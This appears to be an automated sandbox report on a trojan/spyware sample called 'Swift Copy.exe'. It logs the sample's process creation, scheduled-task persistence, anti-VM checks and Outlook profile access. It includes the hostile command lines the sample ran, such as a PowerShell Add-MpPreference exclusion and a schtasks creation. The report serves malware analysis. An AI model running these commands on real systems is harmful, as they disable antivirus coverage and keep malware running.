          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\Swift Copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Swift Copy.exeFile created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exeJump to behavior
          Source: C:\Users\user\Desktop\Swift Copy.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE16E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/9@6/5
          Source: C:\Users\user\Desktop\Swift Copy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: Swift Copy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
          Source: C:\Users\user\Desktop\Swift Copy.exeMutant created: \Sessions\1\BaseNamedObjects\qLSjiKzPfybrIOdxeHK
          Source: Swift Copy.exe, u000fu2004.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Swift Copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Swift Copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Swift Copy.exe, u000fu2004.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_0233E250 pushad ; ret
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_049C2057 push ebx; retf
          Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_049C7732 push 2400005Eh; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0191D0D1 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041F358 push dword ptr [4E772C75h]; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.431867015823937
          Source: initial sampleStatic PE information: section name: .text entropy: 7.431867015823937
          Source: C:\Users\user\Desktop\Swift Copy.exeFile created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1816Thread sleep time: -45877s >= -30000s
          Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F6B90 rdtsc
          Source: C:\Users\user\Desktop\Swift Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9125
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 4.6 %
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeThread delayed: delay time: 45877
          Source: C:\Users\user\Desktop\Swift Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.380692577.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 0000000B.00000000.334568953.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 0000000B.00000000.300110801.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
